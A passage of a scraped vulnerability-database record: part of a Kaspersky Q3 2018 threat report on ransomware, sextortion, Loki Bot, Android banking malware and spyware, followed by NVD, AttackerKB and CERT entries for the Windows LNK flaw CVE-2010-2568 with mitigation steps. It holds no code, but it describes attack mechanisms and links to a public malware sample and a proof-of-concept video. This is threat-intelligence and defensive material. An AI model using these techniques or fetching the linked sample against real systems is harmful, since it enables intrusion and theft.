As a result, in the case of offline encryption, decryption of the victim's files will be trivial.\n\nProbably the most interesting feature of the KeyPass Trojan is its ability to take 'manual control'. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.\n\n### Sextortion with a twist\n\nScams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One [recent 'sextortion' scam](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim's contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/10/31090941/sextortion-scam.png>)\n\nThe scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. 
The passwords were probably obtained in an underground market and came from an earlier data breach.\n\n### The hunt for corporate passwords\n\nIt's not just individuals who are targeted by phishing attacks \u2013 starting from early July, we saw [malicious spam activity targeting corporate mailboxes](<https://securelist.com/loki-bot-stealing-corporate-passwords/87595/>). The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.\n\nThe messages are diverse in nature. They include fake notifications from well-known companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28150313/180827-loki-2.png>)\n\nOr fake orders or offers:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28150313/180827-loki-3.png>)\n\nThe scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.\n\nEach year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That's why it's essential for corporate security strategy to include both technical protection and staff education \u2013 to stop them becoming the entry-point for a cyberattack.\n\n### Botnets: the big picture\n\nSpam mailshots with links to malware, and bots downloading other malware, are just two [botnet](<https://encyclopedia.kaspersky.com/glossary/botnet/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) deployment scenarios. 
The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of [botnet activity for H2 2017 and H1 2018](<https://securelist.com/what-are-botnets-downloading/87658/>).\n\nHere are the main trends that we identified by analyzing the files downloaded by bots:\n\n * The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.\n * The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.\n * The share of banking Trojans among bot-downloaded files in 2018 decreased, but it's too soon to speak of an overall reduction in number, since they are often delivered by droppers.\n * Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the 'specialization' of the botnet.\n\n### Using USB devices to spread malware\n\nUSB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors \u2013 most notably in the case of the state-sponsored threat [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>), which used USB devices to inject malware into the network of an Iranian nuclear facility.\n\nThese days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. 
Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.\n\nKaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim's computer and include infections caused by removable media such as USB devices.\n\nWe recently published a [review of the current cyberthreat landscape for removable media, particularly USBs](<https://securelist.com/usb-threats-from-malware-to-miners/87989/>), and offered advice and recommendations for protecting these little devices and the data they carry.\n\nHere is a summary of our findings.\n\n * USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.\n * The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.\n * Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% \u2013 up from 6.7% in 2017 and 4.2% in 2016.\n * Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.\n * The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.\n * Emerging markets are the most vulnerable to malicious infection spread by removable media \u2013 with Asia, Africa and South America among the most affected \u2013 but isolated hits were also detected in countries in Europe and North America.\n * Dark Tequila, a complex banking malware reported in August 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly 
through USB devices.\n\n### New trends in the world of IoT threats\n\nThe use of smart devices is increasing. Some [forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggest that by 2020 the number of smart devices will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices \u2013 for example, air conditioning.\n\nMalware for smart devices is increasing not only in quantity but also in quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.\n\nYou can read our report on IoT threats [here](<https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/>), including tips on how to reduce the risk of smart devices being infected.\n\n### A look at the Asacub mobile banking Trojan\n\nThe first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim's apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017, helping it to claim top spot in last year's ranking of mobile banking Trojans \u2013 out-performing other families such as Svpeng and Faketoken. 
The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia's largest banks.\n\nThe malware is spread via SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/27104529/180827-asacub-8.png>)\n\nAsacub masquerades as an MMS app or a client of a popular free ads service.\n\nOnce installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim's device \u2013 smartphone model, operating system, mobile operator and Trojan version.\n\nAsacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What's more, the victim can't subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.\n\nYou can read more [here](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>).\n\n### BusyGasper \u2013 the unfriendly spy\n\nEarly in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named [BusyGasper](<https://securelist.com/busygasper-the-unfriendly-spy/87627/>). 
The malware isn't sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol \u2013 about 100 commands \u2013 and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications \u2013 WhatsApp, Viber and Facebook. It also includes some keylogging tools \u2013 the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.\n\nThe malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker's email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28151007/180828-busygasper-2.png>)\n\nThere is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/28151114/180828-busygasper-12.png>)\n\nThe operator can use this interface to type any command. It also shows a current malware log.\n\nThis particular operation has been active since May. We have found no evidence of spear phishing or other common infection methods. 
Some clues, such as the existence of a hidden menu mentioned above, suggest a manual installation method \u2013 the attackers gaining physical access to a victim's device in order to install the malware. This would explain the number of victims \u2013 fewer than 10 in total, all located in Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.\n\n### Thinking outside the [sand]box\n\nOne of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operates in a 'sandbox' that can't be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it's unable to access data held by legitimate apps \u2013 for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.\n\nIn August, at DEF CON 26, Checkpoint researcher Slava Makkaveev discussed a new way of escaping the Android sandbox, dubbed a ['Man-in-the-Disk' attack](<https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/>).\n\nAndroid also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area \u2013 the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. 
However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.\n\nThe problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.\n\nGoogle researchers discovered that [the same method of attack could be applied to the Android version of the popular game, Fortnite](<https://thehackernews.com/2018/08/fortnite-android-app-apk.html>). To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers \u2013 Epic Games \u2013 have already issued a new version of the installer. So, if you're a Fortnite player, use version 2.1.0 or later to be sure that you're safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.\n\n### How safe are car sharing apps?\n\nThere has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, this raises the question of security \u2013 how safe is the personal information of people using these services?\n\nThe obvious reason why cybercriminals might be interested in car sharing is that they want to ride in someone's car at someone else's expense. 
But this could be the least likely scenario \u2013 it's a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason \u2013 driven by demand from those who don't have a driving license or who have been refused registration by the car sharing service's security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else's car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else's name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.\n\nWe tested 13 apps to see if their developers have considered security.\n\nFirst, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app's process and gain access to authentication data.\n\nSecond, we checked to see if it was possible to create a username and password when using a service. Many services use a person's phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.\n\nThird, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. 
We also checked how easy it is to overlay an app's interface with a fake authorization window.\n\nThe results of our tests were not encouraging. It's clear that app developers don't fully understand the current threats to mobile platforms \u2013 this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities \u2013 only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.\n\nYou can read our report [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>), including advice for customers of car sharing services and recommendations for developers of car sharing apps.", "published": "2018-11-12T10:00:24", "modified": "2018-11-12T10:00:24", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://securelist.com/it-threat-evolution-q3-2018/88635/", "reporter": "David Emm", "references": [], "cvelist": ["CVE-2010-2568"], "lastseen": "2018-11-12T10:38:40", "viewCount": 116, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-11-12T10:38:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-2568"]}, {"type": "attackerkb", "idList": ["AKB:01D63072-BA00-4550-BD35-941F73657FDB"]}, {"type": "threatpost", "idList": ["THREATPOST:5202B8AD19491EC98E5A6D0691C3F16C", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:EE3B2C051F98B1FC8B031246AF4EBA62", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "THREATPOST:FD55FE2A305AB024AFF39336C3AA9731", 
"THREATPOST:13BF380EC94838E00D8D4BD43095E77A", "THREATPOST:F3563336B135A1D7C1251AE54FDC6286", "THREATPOST:177DA099F0CCEE2A79F823573B22840A"]}, {"type": "nessus", "idList": ["SMB_KB_2286198.NASL", "SMB_NT_MS10-046.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:902226", "OPENVAS:1361412562310902226"]}, {"type": "canvas", "idList": ["WINDOWS_SHELL_LNK"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS10_046_SHORTCUT_ICON_DLLLOADER", "MSF:EXPLOIT/WINDOWS/SMB/MS10_046_SHORTCUT_ICON_DLLLOADER", "MSF:POST/WINDOWS/GATHER/FORENSICS/FANNY_BMP_CHECK/"]}, {"type": "saint", "idList": ["SAINT:23F1F2BDDAAD19D660289BACF901A811", "SAINT:D73D956898E75970CBB67DF23C41B8A0", "SAINT:0083688CA07FA21D6F4D1102BD0550AB"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:515F885592B6DF57D6F93B1D92D2782D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:91994", "PACKETSTORM:92425"]}, {"type": "cert", "idList": ["VU:824672", "VU:940193"]}, {"type": "securelist", "idList": ["SECURELIST:048C7F20536D86F920F5CE9B67D02D6B", "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11026", "SECURITYVULNS:DOC:24364"]}, {"type": "exploitdb", "idList": ["EDB-ID:16574", "EDB-ID:14403"]}, {"type": "ics", "idList": ["ICSA-10-201-01C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788412", "MYHACK58:62201788476"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B65D62B8E1AD22C908D33D641FD0A55E"]}], "modified": "2018-11-12T10:38:40", "rev": 2}, "vulnersScore": 8.4}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:45:00", "description": "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems.\nPer: http://www.microsoft.com/technet/security/advisory/2286198.mspx\r\n\r\nMicrosoft has completed the investigation into a public report of this vulnerability. We have issued MS10-046 to address this issue.\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS10-046.mspx", "edition": 4, "cvss3": {}, "published": "2010-07-22T05:43:00", "title": "CVE-2010-2568", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2568"], "modified": "2019-02-26T14:04:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_2003_server:*", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2010-2568", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2568", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:*:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:gold:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:x64:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-04-15T21:15:39", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2010-2772"], "description": "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens 
WinCC SCADA systems.\n\n \n**Recent assessments:** \n \n**loneicewolf** at February 08, 2021 8:53pm UTC reported:\n\n<https://github.com/loneicewolf/fanny.bmp/blob/main/Reports/Fanny.BMP(DementiaWheel)_Technical_Report_By_WilliamMartens-2021-10Feb.pdf>\n\nTechnical Write up: DONE. Finally, it\u2019s available here for read \n(and, please feedback! if you have any) \n<https://www.youtube.com/watch?v=Uto_lcD2f38> POC video for windows xp SP3\n\nSample: <https://github.com/loneicewolf/fanny.bmp>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2010-07-22T00:00:00", "id": "AKB:01D63072-BA00-4550-BD35-941F73657FDB", "href": "https://attackerkb.com/topics/nffaTD2h9a/cve-2010-2568", "type": "attackerkb", "title": "CVE-2010-2568", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:13", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568"], "description": "### Overview \n\nMicrosoft Windows automatically executes code specified in shortcut (`LNK` and `PIF`) files.\n\n### Description \n\nMicrosoft Windows supports the use of shortcut or `LNK` files. A `LNK` file is a reference to a local file. A `PIF` file is a shortcut to a MS-DOS application. Clicking on a `LNK` or `PIF` file has essentially the same outcome as clicking on the file that is specified as the shortcut target. For example, clicking a shortcut to `calc.exe` will launch `calc.exe`, and clicking a shortcut to `readme.txt` will open `readme.txt` with the associated application for handling text files.\n\nMicrosoft Windows fails to safely obtain icons for shortcut files. When Windows displays Control Panel items, it will initialize each object for the purpose of providing dynamic icon functionality. This means that a Control Panel applet will execute code when the icon is displayed in Windows. 
Through use of a shortcut file, an attacker can specify a malicious DLL that is to be processed within the context of the Windows Control Panel, which will result in arbitrary code execution. The specified code may reside on a USB drive, local or remote filesystem, a CD-ROM, or other locations. Viewing the location of a shortcut file with Windows Explorer is sufficient to trigger the vulnerability. By default, Microsoft Windows has AutoRun/AutoPlay features enabled. These features can cause Windows to automatically open Windows Explorer when a removable drive, such as a USB thumb drive, is connected. Other applications that display file icons can be used as an attack vector for this vulnerability as well. When used in conjunction with a WebDav resource, Internet Explorer can be used as an attack vector for this vulnerability. With the case of Internet Explorer, no user interaction beyond viewing a web page is required to trigger the vulnerability. \n \nThis vulnerability is being exploited in the wild to spread malware (stuxnet) that targets control systems. Exploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to display a specially-crafted shortcut file, an attacker may be able to execute arbitrary code with the privileges of the user. Depending on the operating system and AutoRun/AutoPlay configuration, this can happen automatically by connecting a USB device. This vulnerability can also be triggered by viewing a web page with Internet Explorer or opening a document with Microsoft Office. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Microsoft Security Bulletin [MS10-046](<http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>). 
Also consider the following workarounds: \n \n--- \n \n \n**Disable the displaying of icons for shortcuts** \n \nAccording to Microsoft Security Advisory 2286198: \n \n**_Note_**_ See _[_Microsoft Knowledge Base Article 2286198_](<http://support.microsoft.com/kb/2286198>)_ to use the automated Microsoft Fix it solution to enable or disable this workaround._ \n \n**_Note_**_ Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the \"Changing Keys And Values\" Help topic in Registry Editor (Regedit.exe) or view the \"Add and Delete Information in the Registry\" and \"Edit Registry Data\" Help topics in Regedt32.exe._ \n\n\n 1. _Click Start, click Run, type Regedit in the Open box, and then click OK._\n 2. _Locate and then click the following registry key: \n_`_HKEY_CLASSES_ROOT\\lnkfile\\shellex\\IconHandler_`\n 3. _Click the File menu and select Export._\n 4. _In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save. \nNote This will create a backup of this registry key in the My Documents folder by default_\n 5. _Select the value (Default) on the right hand window in the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter._\n 6. _Locate and then click the following registry key: \n_`_HKEY_CLASSES_ROOT\\piffile\\shellex\\IconHandler_`\n 7. _Click the File menu and select Export._\n 8. _In the Export Registry File dialog box, enter PIF_Icon_Backup.reg and click Save. \nNote This will create a backup of this registry key in the My Documents folder by default._\n 9. _Select the value (Default) on the right hand window in the Registry Editor. Press Enter to edit the value of the key. 
Remove the value, so that the value is blank, and press Enter._\n 10. _Log all users off and on again, or restart the computer._\nNote that this mitigation may prevent Windows shortcuts from displaying some icons. \n \n**Disable AutoRun** \n \nDisabling AutoRun can increase the amount of user interaction that is required to trigger this vulnerability. It will not block the vulnerability, however. Please see Microsoft Support article [967715](<http://support.microsoft.com/kb/967715>) for more details. Setting the `NoDriveTypeAutoRun` registry entry to `0xFF` should provide the highest amount of protection. \n \n**Use least privilege** \n \nUse a \"least privilege\" approach to user accounts. By reducing the privileges of the user accounts, the impact of this and other vulnerabilities may be reduced. More information about this technique is available in the Microsoft TechNet article [Applying the Principle of Least Privilege to User Accounts on Windows XP](<http://technet.microsoft.com/en-us/library/bb456992.aspx>). Note that these concepts still apply to Windows Vista and newer operating systems. \n \n**Disable the WebClient service** \n \nAccording to Microsoft Security Advisory [2286198](<http://www.microsoft.com/technet/security/advisory/2286198.mspx>): \n \n_Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet._ \n \n_To disable the WebClient Service, follow these steps:_\n\n 1. _Click Start, click Run, type Services.msc and then click OK._\n 2. 
_Right-click WebClient service and select Properties._\n 3. _Change the Startup type to Disabled. If the service is running, click Stop._\n 4. _Click OK and exit the management application._\n**Block outgoing SMB traffic** \n \nBlock outgoing connections on ports 139/tcp, 139/udp, 445/tcp, and 445/udp at your network perimeter. Doing so will help prevent machines on the local network from connecting to SMB servers on the internet. While this does not remove the vulnerability, it does block an attack vector for this vulnerability. \n \n**Use a web browser other than Internet Explorer** \n \nInternet Explorer is very closely integrated with the Microsoft Windows operating system. Because of this, Internet Explorer can often be used as an attack vector for vulnerabilities in the Microsoft Windows operating system. In this case, Internet Explorer can be used to trigger the vulnerability with no user interaction required beyond visiting a malicious or compromised website. Other browsers appear to require additional user interaction. \n--- \n \n### Vendor Information\n\n940193\n\n
### Microsoft Corporation Affected\n\nNotified: July 15, 2010 Updated: August 02, 2010 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis issue is addressed in Microsoft Security Bulletin [MS10-046](<http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>).\n\n### Vendor References\n\n * <http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>\n * <http://support.microsoft.com/kb/2286198>\n * <http://www.microsoft.com/technet/security/advisory/2286198.mspx>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx>\n * <http://www.microsoft.com/technet/security/advisory/2286198.mspx>\n * <http://support.microsoft.com/kb/2286198>\n * <http://isc.sans.edu/diary.html?storyid=9190>\n * <http://www.securityfocus.com/bid/41732>\n * <http://secunia.com/advisories/40647/>\n * <http://support.microsoft.com/kb/967715>\n * <http://www.anti-virus.by/en/tempo.shtml>\n * <http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/>\n * <http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf>\n * <http://www.f-secure.com/weblog/archives/00001986.html>\n * <http://www.f-secure.com/weblog/archives/00001987.html>\n * <http://support.automation.siemens.com/WW/view/en/43876783>\n\n### Acknowledgements\n\nThis vulnerability was discovered by VirusBlokAda through its exploitation in the wild.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-2568](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-2568>) \n---|--- \n**Severity Metric:** | 72.90 \n**Date Public:** | 2010-07-10 \n**Date First Published:** | 2010-07-15 \n**Date Last Updated: ** | 2010-09-09 19:59 UTC \n**Document Revision: ** | 83 \n", "modified": 
